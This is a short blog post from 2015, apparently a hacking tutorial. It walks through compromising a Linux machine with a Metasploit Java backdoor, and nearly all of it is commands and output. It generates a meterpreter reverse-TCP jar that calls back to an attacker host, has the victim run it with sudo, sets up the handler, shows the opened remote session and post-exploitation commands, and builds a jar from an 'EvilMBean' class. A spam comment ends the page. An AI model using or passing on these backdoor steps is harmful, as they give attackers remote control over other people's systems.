Saturday, February 21, 2015

Compromising machines running Linux using Metasploit JAR Backdoors

We can compromise Windows machine using malicious EXE file acting as a backdoor generated using Metasploit. Machines running  Linux can be compromised using jar backdoors.

Creating jar backdoor file using Metasploit msfpayload to hack Linux box
root@kali-praveend-attacker:~# msfpayload java/meterpreter/reverse_tcp LHOST=1.1.1.32 LPORT=8888 R > compromise.jar
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************

Execute the jar file created above on Linux box
praveen@victim:/tmp$ sudo java -jar compromise.jar

On Kali Execute below commands so that victim will connect back to the attacker when victim executes JAR backdoor
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.1.1.32
LHOST => 1.1.1.32
msf exploit(handler) > set LPORT 8888
LPORT => 8888
msf exploit(handler) > exploit
msf exploit(handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (java/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  1.1.1.32         yes       The listen address
   LPORT  8888             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.32:8888
[*] Starting the payload handler...
[*] Sending stage (30355 bytes) to 1.1.1.40
[*] Meterpreter session 1 opened (1.1.1.32:8888 -> 1.1.1.40:33457) at 2015-02-15 17:49:04 -0500

Post exploitation commands
meterpreter > sysinfo
Computer    : victim
OS          : Linux 3.13.0-32-generic (amd64)
Meterpreter : java/java
meterpreter > pwd
/tmp

Creating jar file from class file.
root@kali-ucs:~/rmx_remote# jar cvf compromise.jar EvilMBean.class
added manifest
adding: EvilMBean.class(in = 172) (out= 134)(deflated 22%)


1 comment:

  1. You are giving acceptable data inside your blog. It will help many individuals who need to think about this data. Continue imparting educational sites to us. oracle fusion SCM training india

    ReplyDelete